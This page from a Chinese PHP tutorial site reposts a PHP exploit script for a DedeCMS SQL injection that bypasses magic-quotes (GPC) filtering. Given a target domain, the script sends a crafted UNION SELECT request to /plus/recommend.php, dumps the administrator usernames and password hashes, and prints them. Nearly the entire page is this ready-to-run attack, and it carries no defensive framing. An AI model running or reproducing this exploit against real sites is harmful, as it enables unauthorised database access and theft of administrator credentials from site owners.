来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] ?phpprint_r(+------------------------------------+DEDECMS全版本无视GPC注入code by :SunshieUsage:$argv[0] domainExample: php exe$argv[0] www phpinfo me+----------------------------------...
<?php
print_r(
"
+------------------------------------+
DEDECMS全版本无视GPC注入
code by :Sunshie
Usage:$argv[0] <domain>
Example: php.exe$argv[0] www.phpinfo.me
+------------------------------------+
"
);
if($argv[1]==""){
exit("不逗比我们还是好朋友");
}else{
$sb=$argv[1];
echo"Explot....\n";
$exp=@file_get_contents("http://$sb//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23");
if(!$exp)echo"尼玛,不能访问";
eregi("_<abc>(.*)</abc>_",$exp,$arr);
if(!$arr[0])echo"洞已补";
$exploit=str_replace("_<abc>","==fuck",$arr[0]);
$exploit=str_replace("</abc>_","fuck==",$exploit);
echo$exploit;
}
?>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
